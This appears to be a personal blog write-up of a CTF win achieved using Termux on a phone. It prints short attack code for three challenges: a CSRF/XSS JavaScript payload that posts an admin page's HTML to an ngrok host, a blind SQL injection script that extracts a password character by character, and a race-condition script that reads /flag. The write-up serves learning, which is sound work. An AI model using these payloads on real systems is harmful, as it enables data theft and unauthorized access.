Published on

Holding 1st at a CTF with Just a Phone

Authors
  • avatar
    Name
    Ailton Baúque (vybraan)
    Twitter
    @vybraan

A Journey of Ingenuity

You don't need a powerful computer to hack, sometimes a simple smartphone, a bit of creativity and a knack for problem-solving is all you need. That's exactly how I won first place in a Capture The Flag (CTF) challenge during the summer of 2023, as part of UEM's ICT4Dev program. I didn't have a laptop, so I turned my phone into a hacking station and got to work on the challenges that really tested my patience.

I relied on Termux, an Android terminal emulator that became my makeshift development environment. Termux allowed me to install essential tools. I had to deal with challenges like SQL injection and Cross-Site Request Forgery, Obeject Serialization, etc, and I tried different solutions to get past these problems.

For example, when I needed to check network resources, I changed Termux into a GUI environment. I installed Xorg, VNC Server, Openbox and Firefox, and used VNC Viewer from the Play Store to create a desktop-like environment and access developer tools for tasks like cookie manipulation. The setup was far from smooth, but it got the job done.

So, to get Termux set up, you'll need to follow some of the steps I mentioned in this other article: article.

The challenges were of a Jeopardy-style, requiring creativity and skill, and the capabilities of the phone were more than adequate.

1. CSRF Attack via Ngrok

To exploit a server-side vulnerability, I used Ngrok to expose a local server to the internet. A simple HTTP request logger in Python stolen from github to capture POST requests, I captured POST requests sent by a smuggled JavaScript payload executed in the admin’s browser

Python Logger Code:

"""
License: MIT License
Copyright (c) 2023 Miel Donkers
Very simple HTTP server in python for logging requests
Usage::
    ./server.py [<port>]
"""
from http.server import BaseHTTPRequestHandler, HTTPServer
import logging

class SimpleLogger(BaseHTTPRequestHandler):
    def do_POST(self):
        content_length = int(self.headers['Content-Length'])
        post_data = self.rfile.read(content_length)
        logging.info(f"POST request: {post_data.decode('utf-8')}")
        self.send_response(200)
        self.end_headers()

HTTPServer(('', 8080), SimpleLogger).serve_forever()

Smuggled JavaScript payload executed by the admin:

//simplified version
fetch('https://example.ngrok.io', {
  method: 'POST',
  headers: {'Content-Type': 'application/x-www-form-urlencoded'},
  body: `data=${encodeURIComponent(document.body.innerHTML)}`
});

And just like that, I snagged the flag hidden in admin-only data.

2. Blind SQL Injection

Blind SQLi is tedious but rewarding. I wrote a script to extract a password one character at a time by comparing ASCII values and and identify the correct characters:

# simplified version
import requests

for position in range(1, 41):  # Assuming a 40-character password - wild guess
    for char_code in range(32, 127):  # Printable ASCII range
        injection = f"' AND ASCII(SUBSTRING(password,{position},1))={char_code} -- "
        response = requests.post(
            "http://vulnerable-site.com/login",
            data={"username": "admin", "password": injection}
        )
        if "Welcome" in response.text:
            print(chr(char_code), end='', flush=True)
            break

This brute-forced the flag character by character. Slow? Yes. Effective? Absolutely.

3. Race Condition Exploitation

To exploit a race condition, I used threads to send simultaneous requests to allow me to execute restricted actions by triggering concurrent processes.

# simplified version
from threading import Thread
import requests

def send_request(payload):
    requests.post("http://vulnerable-site.com/run", data={"code": payload})

payload_1 = "print('Hello, world!')"
payload_2 = "f=open('/flag'); print(f.read())"

Thread(target=send_request, args=(payload_1,)).start()
Thread(target=send_request, args=(payload_2,)).start()

One thread ran normal code while the other accessed a restricted file, revealing the flag.

You check

The CTF was a thrilling reminder that hacking is less about the equipment you have and more about how you think. Fancy hardware can make life easier, but creativity is the ultimate hacking tool.

That’s all, see ya!

Discuss on TwitterView on GitHub